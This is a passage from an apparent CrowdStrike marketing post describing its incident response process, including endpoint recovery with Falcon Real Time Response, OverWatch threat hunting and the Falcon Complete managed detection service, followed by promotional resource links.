In effect, the first four ingredients are the key: gain immediate threat visibility, contain the active threat, accelerate the forensic analysis, and recover the endpoints using real-time response. We do this to minimize the percentage of endpoints that require full system remediation. We want to recover the majority of endpoints using real-time response, so we only have to focus on reimaging or rebuilding a much smaller number of systems. For some clients, we are able to recover all of their systems using CrowdStrike Falcon® Real Time Response, enabling them to get back to business faster. 

While we are typically able to recover environments rapidly, we continue to support our clients with threat hunting and monitoring from the Falcon OverWatch™ threat hunting team for the duration of the engagement. Adversaries that gain access to a network look to establish persistence within your environment and are not going to go away easily. The OverWatch team monitors for any recurrence of the initial threat and any hands-on-keyboard activity that the adversary might attempt. At the end of the CrowdStrike Services Incident Response engagement, we want our clients to feel confident they have recovered from the breach and ejected the adversary completely from the network. For those clients that never wish to go through this again, we offer a fully managed detection and response (MDR) solution, Falcon Complete™, which allows customers to continue running the Falcon platform while relying on the expertise of our team to detect threats in 1 minute, investigate in 10 minutes and respond inside of 1 hour to prevent breaches from impacting their business.

For more details on our modern intelligence-led approach to rapid response and recovery from today’s widespread security incidents, download our eBook on CrowdStrike Incident Response.

Additional Resources

  • Learn more about how CrowdStrike Breach Services can help you respond to an attack with speed and recover from an incident with surgical precision.
  • Download the complete CrowdStrike Incident Response eBook to learn more about CrowdStrike’s modern approach to rapid response and recovery from today’s widespread security incidents.
  • Get on-demand access to CrowdStrike incident responders, forensic investigators, threat hunters and endpoint recovery specialists with a CrowdStrike Services Retainer.